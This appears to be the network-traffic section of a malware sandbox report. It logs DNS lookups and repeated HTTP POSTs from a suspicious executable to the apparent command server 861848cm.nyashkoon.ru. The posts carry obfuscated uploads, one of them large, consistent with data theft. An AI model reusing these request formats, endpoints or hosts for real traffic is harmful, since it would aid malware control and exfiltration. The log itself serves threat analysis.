                                                                                            Nov 5, 2024 23:54:43.945738077 CET805015637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:43.945791960 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.945889950 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:43.950706005 CET805015637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:44.289855957 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.295070887 CET805015637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:44.788541079 CET805015637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:44.868148088 CET805015637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:44.870296955 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.991453886 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.991462946 CET5015780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.993067026 CET5012280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.996296883 CET805015737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:44.996737957 CET805015637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:44.996822119 CET5015680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.996829033 CET5015780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:44.997946978 CET5015780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:45.002852917 CET805015737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:45.352319956 CET5015780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:45.357254982 CET805015737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:45.818006992 CET805015737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:45.897645950 CET805015737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:45.897721052 CET5015780192.168.2.437.44.238.250

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 5, 2024 23:52:31.364613056 CET5886453192.168.2.41.1.1.1
                                                                                            Nov 5, 2024 23:52:31.496128082 CET53588641.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 5, 2024 23:52:31.364613056 CET192.168.2.41.1.1.10x85c9Standard query (0)861848cm.nyashkoon.ruA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 5, 2024 23:52:31.496128082 CET1.1.1.1192.168.2.40x85c9No error (0)861848cm.nyashkoon.ru37.44.238.250A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • 861848cm.nyashkoon.ru

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.44973637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:31.535790920 CET332OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 344
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:31.884418964 CET344OUTData Raw: 05 07 04 01 06 0a 01 0b 05 06 02 01 02 06 01 0b 00 04 05 0c 02 04 03 0e 00 51 0f 0c 03 0e 06 08 0a 04 05 0c 01 01 04 01 0d 0b 07 00 07 05 05 06 03 05 0f 0f 0f 04 07 0a 05 03 06 53 01 07 05 08 05 00 0e 09 04 07 01 08 0c 07 0b 04 0d 56 0b 01 05 54
                                                                                            Data Ascii: QSVTVUP\L~CN~`bT]v[wP|UivohkZhlooKxse_}~lwwpje~V@Bz}T}ri
                                                                                            Nov 5, 2024 23:52:32.337801933 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:32.430362940 CET1236INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 1364
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 56 4a 7d 5d 78 7d 68 5b 6f 5b 7b 5b 7c 07 77 00 7c 77 7b 4f 7f 60 75 08 6d 63 7f 5f 7d 61 6f 5b 60 5a 61 4f 6e 72 7a 59 75 58 5a 01 69 5b 78 01 55 4b 71 0c 77 62 74 58 6b 4c 75 4d 68 5e 6a 0a 79 65 70 0c 7d 5d 51 03 76 5c 71 04 77 61 5b 47 7f 5f 54 04 7e 7c 7f 54 69 67 64 5a 75 4c 7b 06 7c 5c 5b 05 7c 63 61 02 6f 59 68 06 78 77 60 05 78 53 60 5a 7a 71 6f 5a 7a 70 6d 5b 68 5e 60 49 6f 49 56 00 7d 72 67 4e 76 71 59 5b 7a 51 41 5b 7f 5e 68 4f 6b 4f 7d 0b 61 55 6c 41 6f 7c 60 03 74 60 72 43 6d 58 6d 48 7e 6c 66 06 7b 71 7e 48 62 60 7f 4b 75 72 7f 5a 60 07 62 50 7e 5d 7a 06 76 72 6d 4f 76 66 60 09 7f 7c 66 59 77 6f 68 04 7c 70 7c 01 78 6f 6f 03 6f 60 65 5a 7c 6d 5d 51 77 5e 7c 04 69 62 75 50 69 6d 6f 09 6c 6e 61 5c 6a 62 79 04 7b 5d 46 51 7f 6c 51 51 7e 60 5d 55 7e 74 7a 4c 6c 6d 77 44 7b 72 78 04 7f 62 77 02 7d 59 55 0d 7c 59 7a 50 6e 73 7b 58 6a 62 7c 01 76 60 79 51 7b 5c 79 4a 76 76 78 07 7e 76 64 4f 7f 76 75 0d 74 72 73 01 7c 62 69 06 7f 49 76 09 78 58 7c 41 7e 63 7f 4a 75 72 79 06 77 71 61 00 7c 71 [TRUNCATED]
                                                                                            Data Ascii: VJ}]x}h[o[{[|w|w{O`umc_}ao[`ZaOnrzYuXZi[xUKqwbtXkLuMh^jyep}]Qv\qwa[G_T~|TigdZuL{|\[|caoYhxw`xS`ZzqoZzpm[h^`IoIV}rgNvqY[zQA[^hOkO}aUlAo|`t`rCmXmH~lf{q~Hb`KurZ`bP~]zvrmOvf`|fYwoh|p|xooo`eZ|m]Qw^|ibuPimolna\jby{]FQlQQ~`]U~tzLlmwD{rxbw}YU|YzPns{Xjb|v`yQ{\yJvvx~vdOvutrs|biIvxX|A~cJurywqa|qb~R`}gcv_czru}NqD{Y^N{wZO{S{FzLVxs~^pygd~b]wqVG~RcE}wR@Ouw|ZxBVt^vyaq|lv{O~HwssJualwOT`fwbSLveZ~lWtRt~s`DxRozpfClAtItbr~m]{mzbWpRB}lppx|gfxS{rdI_w}I]~pqzc|}bdtMuzqqvXZ|fh}vawrkbi}gfyvZB}cHv\uta_G|OfF}RV~wQua{LqI~^y{gZ{Y`{}gzrxIx]v{]NZ{ddDj\gwrx~RtXhd||bRaw^xBc[c`~yOf]jz_z\yvxBagx[L~Jx^fNtrr]b[RRyt|R~`txlUl`~|}xt^`}L}PzSYQQT[]jafWlcWPNRIKP{}BldIUwUrZDP^kc~npoXincB]pjKVT_[^sKRjk_Tun}[VFPq]h{~PzqpA|s`Yab_`Oqk_Xj|^iYcwq^\xby}cj_{glxZpS@x_maFWaXScUU^cKWa`M\v|zRsJA|aeLuRlAyRRp]@PnbFPKo_D`xC\}^_v\}|hcKD`nu\trsVkoB[po[P`UUU`\TcF{SVPotoinzQz|VonAR~fY [TRUNCATED]
                                                                                            Nov 5, 2024 23:52:32.430389881 CET285INData Raw: 5d 68 61 09 42 50 7b 65 57 57 65 0c 5e 6a 05 0b 01 5a 58 6a 4f 5c 60 76 46 6b 72 66 58 7f 51 7f 6f 65 4a 7b 40 71 58 56 5c 57 05 7a 43 57 63 5c 43 54 5f 00 5e 54 00 6f 40 52 71 78 04 63 5b 73 45 6f 64 7e 00 7b 58 6f 46 57 6b 67 5f 69 75 74 63 5c
                                                                                            Data Ascii: ]haBP{eWWe^jZXjO\`vFkrfXQoeJ{@qXV\WzCWc\CT_^To@Rqxc[sEod~{XoFWkg_iutc\rsi`{UPh_cbU[UU\lkxBpYSUVvCWoWFWY[ZYbZ[[e}Sa[p\W\qXNQkfCZAkUFnxDWZaCPToL]v^RabQ|PQyz}Xja@P|gVSo_RswRkeo~gZy_xX}vx]idOS|fVU`SRqDc\Pbb_qX
                                                                                            Nov 5, 2024 23:52:32.465353966 CET308OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 384
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:32.696547985 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:32.702004910 CET384OUTData Raw: 56 53 5a 54 53 5d 50 58 5a 5f 52 51 54 52 5b 52 55 5c 59 5c 51 53 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZTS]PXZ_RQTR[RU\Y\QSR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y;6<(3?U7>\=Z*>>3 X#?.T(X?X-37"X%'X$.Q-
                                                                                            Nov 5, 2024 23:52:33.009985924 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5f 28 04 0b 06 30 3b 34 18 3e 3e 21 12 3f 09 3b 5b 2f 54 2c 1c 28 20 24 5c 2a 5e 3f 0c 37 3f 34 05 21 22 35 13 37 0c 2f 59 2b 2b 21 5f 05 1d 39 59 24 29 24 1f 29 31 31 07 29 51 3c 08 32 0e 2b 1c 3d 3b 07 03 37 29 36 1f 26 00 29 12 26 32 0d 54 2b 37 3a 03 2c 2f 02 0e 25 3a 2a 57 09 16 23 08 33 55 30 02 3d 31 2f 58 25 3e 14 07 26 03 3c 0c 3d 3f 23 1f 37 24 08 5c 2a 30 28 03 23 24 3d 04 30 14 3a 42 32 58 28 0b 3f 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: _(0;4>>!?;[/T,( $\*^?7?4!"57/Y++!_9Y$)$)11)Q<2+=;7)6&)&2T+7:,/%:*W#3U0=1/X%>&<=?#7$\*0(#$=0:B2X(?"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.44973737.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:32.964920044 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:33.321182966 CET1024OUTData Raw: 56 54 5a 5a 53 5d 50 5a 5a 5f 52 51 54 5d 5b 58 55 50 59 58 51 55 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VTZZS]PZZ_RQT][XUPYXQUR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;-<+?>%Y=3+"<"(:$47"Y%9'X$.Q-
                                                                                            Nov 5, 2024 23:52:33.776776075 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:33.855174065 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.44973837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:33.151738882 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:33.508646011 CET1284OUTData Raw: 56 52 5f 5f 56 5e 50 58 5a 5f 52 51 54 52 5b 58 55 53 59 5d 51 53 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR__V^PXZ_RQTR[XUSY]QSR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;R?(]<3<X))-X))%;(#/>U?>#[:&0 7:Y2)'X$.Q-
                                                                                            Nov 5, 2024 23:52:33.974004984 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:34.044421911 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 14 3c 39 2e 13 26 3b 24 19 3d 3e 0c 07 2b 23 38 07 2c 1c 0d 03 3e 33 28 10 2b 38 30 50 23 11 2c 00 35 31 22 05 37 54 24 03 3c 3b 21 5f 05 1d 39 13 26 29 3c 55 3e 31 2e 14 3d 34 3c 0a 25 56 38 06 3d 28 39 04 20 2a 35 0d 25 00 3d 5c 26 0c 0d 16 3c 42 35 16 2e 2f 38 0f 26 10 2a 57 09 16 20 57 27 55 30 00 3d 31 3f 12 33 3e 25 5f 32 5c 27 1c 3d 12 2f 5a 37 0a 29 05 2a 23 06 02 22 37 31 04 27 04 08 44 25 10 23 57 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: <9.&;$=>+#8,>3(+80P#,51"7T$<;!_9&)<U>1.=4<%V8=(9 *5%=\&<B5./8&*W W'U0=1?3>%_2\'=/Z7)*#"71'D%#W+2&U" T0]O
                                                                                            Nov 5, 2024 23:52:34.053056002 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:34.287420034 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:34.287585974 CET1024OUTData Raw: 56 57 5f 5e 53 5c 50 59 5a 5f 52 51 54 58 5b 58 55 5c 59 58 51 55 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_^S\PYZ_RQTX[XU\YXQURSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y//.T<(+<3 Z*:**$(^ <= 9&8X '&2)'X$.Q-.
                                                                                            Nov 5, 2024 23:52:34.958347082 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:52:34.958661079 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.44973937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:33.994740009 CET311OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 137804
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:34.352493048 CET12360OUTData Raw: 56 51 5a 54 56 5c 50 5c 5a 5f 52 51 54 5c 5b 59 55 51 59 5c 51 52 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZTV\P\Z_RQT\[YUQY\QRR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;<!(\>#0Z=5==_%+;7"(?,5(7'9'X$.Q->
                                                                                            Nov 5, 2024 23:52:34.357397079 CET2472OUTData Raw: 3b 2b 5a 0b 38 10 3e 3c 26 33 16 28 31 43 3e 1e 37 59 53 51 39 58 35 29 0e 28 23 10 38 30 30 18 28 3d 02 2f 08 07 04 3b 26 5c 30 1c 3e 04 02 5c 25 41 36 17 29 0d 2b 5f 39 08 52 5f 3b 05 21 36 3d 59 2f 11 3c 27 35 25 3e 3c 3c 39 28 20 38 04 3b 5c
                                                                                            Data Ascii: ;+Z8><&3(1C>7YSQ9X5)(#800(=/;&\0>\%A6)+_9R_;!6=Y/<'5%><<9( 8;\^24Z.#Y+/'V';*6<>'Z%4/>=$4_$T;5_6!X$?T2;[7Y11$P/#2<(^*Z?3^6==+(;!&+19QY5 ?071'<#3U.# <7X&93A(9(T:
                                                                                            Nov 5, 2024 23:52:34.357438087 CET7416OUTData Raw: 29 2f 29 27 35 5a 33 21 31 06 33 02 34 32 3b 02 28 30 33 5c 37 36 2d 2c 0d 27 0d 26 36 04 18 28 04 31 2c 5a 00 25 58 32 29 32 51 1e 01 29 50 32 0c 07 33 5f 09 25 10 1e 0a 0a 06 10 30 2d 1c 10 2f 33 1c 01 3b 00 2b 29 30 55 0f 16 28 24 15 43 3e 1e
                                                                                            Data Ascii: )/)'5Z3!1342;(03\76-,'&6(1,Z%X2)2Q)P23_%0-/3;+)0U($C> 6:-X;("2Z\2<T34"Z9[$.9X-%9,Q>[!3WS[0=9?8"95(8:5\^5?S-AR<<*U):0_;6%?9-2:"?<#<-![$0Y9,>RW$'7#+-<"^0',9?[42&
                                                                                            Nov 5, 2024 23:52:34.357522011 CET4944OUTData Raw: 31 02 3f 5a 32 5b 19 0d 29 57 1f 07 31 10 23 21 02 29 01 01 30 31 0a 5b 3f 0a 50 07 06 2a 36 19 3a 5c 0d 35 35 3d 3a 3d 04 56 5f 1a 34 30 2f 04 3e 09 24 13 36 3b 3f 35 3e 05 28 1b 0d 54 0c 19 3d 0d 30 22 02 2e 04 5a 01 0a 00 32 0b 2b 23 04 36 1c
                                                                                            Data Ascii: 1?Z2[)W1#!)01[?P*6:\55=:=V_40/>$6;?5>(T=0".Z2+#65>@2;<1'5;)=Q5%*+1- 3::'*<T=5W&Z,&]0=[:'9/>#9:Y8;C=_75<!RY#*(/$A)1>3)9._ >Y&<1 '>WX(-><*63 (+Y<17>5_&.$+!>[Z0.(
                                                                                            Nov 5, 2024 23:52:34.357620955 CET2472OUTData Raw: 01 31 17 22 33 26 2c 40 31 0d 54 43 35 5f 52 05 09 05 29 0a 26 3c 0c 04 32 54 3c 26 2b 37 1c 37 01 07 27 1f 3a 05 07 34 35 37 33 35 08 22 0e 58 2c 54 38 3f 0b 3f 14 26 09 07 53 0d 12 06 2c 39 23 25 39 34 07 1d 23 5a 3d 52 25 1a 3d 14 0f 1d 3c 2d
                                                                                            Data Ascii: 1"3&,@1TC5_R)&<2T<&+77':45735"X,T8??&S,9#%94#Z=R%=<-0W(65,?=;$X%5-YT*<9<#;'Q= &[=5#5($>$T7-52[*,)>\TX7#)<4$?);!%Z\1^3<X*1!3#>/P+7;20\9+%$#23.26"4#7'9>_591.X.$
                                                                                            Nov 5, 2024 23:52:34.357750893 CET4944OUTData Raw: 25 52 31 26 39 5a 1e 34 29 5d 2f 5c 30 06 1e 53 3e 31 0f 27 3e 01 06 10 28 24 38 15 04 08 2b 24 28 0a 5d 1f 00 29 2d 24 3e 05 09 0e 05 10 21 58 34 56 5f 26 31 33 2f 3f 31 31 0d 5f 32 16 02 19 39 3d 0a 27 0e 0d 51 25 37 54 24 32 3c 20 3e 08 34 0a
                                                                                            Data Ascii: %R1&9Z4)]/\0S>1'>($8+$(])-$>!X4V_&13/?11_29='Q%7T$2< >42,<*+3!V;>B&3*_Z4:)<[>;>Q\[^?0:\,%!8[0)- >Y65_ 8:&9#;&*!>3X)+?+P=?&#"!)?=#4[* T'[.<ZX58,438'E\4&$VX;'
                                                                                            Nov 5, 2024 23:52:34.357769012 CET2472OUTData Raw: 05 0d 49 00 33 5c 27 36 2b 30 2d 5e 02 0d 23 01 3c 31 3b 07 36 02 07 21 3e 02 2e 1f 3f 06 3e 3d 0a 32 24 55 3c 1b 26 17 2e 59 1a 2e 27 3f 2d 39 08 28 3b 04 38 22 3c 29 29 30 30 05 24 2f 2a 18 09 38 06 09 14 58 1a 05 3a 1b 07 15 37 57 1e 02 09 09
                                                                                            Data Ascii: I3\'6+0-^#<1;6!>.?>=2$U<&.Y.'?-9(;8"<))00$/*8X:7W11+-5%,9%2=+)(=/"?\>@?_1\?Z=9""'103-+\<U'%*)?\!:3"4(/92Y^Y8^? )3)5=[' *8#6 '#"X&7+20%0.74$P+*3S?YW
                                                                                            Nov 5, 2024 23:52:34.362332106 CET2472OUTData Raw: 34 07 16 31 32 1c 3b 03 0d 19 0f 28 26 3e 09 5e 31 01 01 07 2a 2c 58 12 07 0e 5f 59 3d 32 05 32 29 06 2f 5a 32 31 06 5c 36 0c 58 05 2b 28 13 13 27 39 23 0e 04 01 59 19 03 08 20 29 07 20 3b 05 3e 0a 19 59 01 3a 27 1b 0c 38 12 22 3b 22 26 1b 34 1c
                                                                                            Data Ascii: 412;(&>^1*,X_Y=22)/Z21\6X+('9#Y ) ;>Y:'8";"&4322#I_)+"(W%>41TB;X9?Z;R*4>9<<X:= 3V??2%+&>\#'Y".9P!&+1&=04' 3[;;=$(\2C#-%#4Q0>0?VV[XZ&0> +9 $0@>T
                                                                                            Nov 5, 2024 23:52:34.362389088 CET4944OUTData Raw: 3a 36 22 5d 24 26 0c 09 31 58 28 2a 04 42 39 30 25 55 0e 58 32 30 2f 3a 25 01 5d 14 3d 36 56 2d 26 0c 03 31 0c 5a 16 50 02 20 18 15 3c 20 33 3c 24 2f 05 1a 3b 32 2c 10 3b 3d 26 3a 30 3f 03 2d 2b 07 3f 5d 2b 30 02 1f 30 3b 22 12 13 3d 3d 04 0b 34
                                                                                            Data Ascii: :6"]$&1X(*B90%UX20/:%]=6V-&1ZP < 3<$/;2,;=&:0?-+?]+00;"==44_;-30797'<R:"$,\T60,,R0T1.=#?*9*P(!3=*()]_P6Y&/(?07]98S4< Z10 [4W=[:5/,/W<492>^&^!%2:#9?>=:-;":8Z==!ZI26(
                                                                                            Nov 5, 2024 23:52:34.362462997 CET7416OUTData Raw: 0e 16 01 1e 3e 2c 2d 0c 05 3d 0a 5a 39 26 2f 39 23 53 31 0c 3a 03 1a 1d 3d 5d 3c 5c 2a 5a 2b 22 2b 32 04 12 01 2d 33 25 34 2a 2f 1f 2f 2e 23 5d 2b 22 1a 5e 28 3a 0f 2f 0b 06 58 1b 05 32 04 13 02 54 0e 19 2e 55 09 03 06 31 05 31 07 39 33 51 0c 07
                                                                                            Data Ascii: >,-=Z9&/9#S1:=]<\*Z+"+2-3%4*//.#]+"^(:/X2T.U1193Q$"83! ,(<-3"^')<2R1';#7+Z=+,22>#S52&/Y,/$Y=8X3>ZY=0#$,02#\#B=0#8"$_')<<:9'?Z#;:<$T5<%,V3>2&0'?+;5S!*5^,+^7
                                                                                            Nov 5, 2024 23:52:34.958822966 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:35.586251020 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.44974237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:52:35.186801910 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:35.540827990 CET1024OUTData Raw: 56 51 5a 54 56 5b 55 58 5a 5f 52 51 54 5c 5b 5a 55 54 59 57 51 57 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
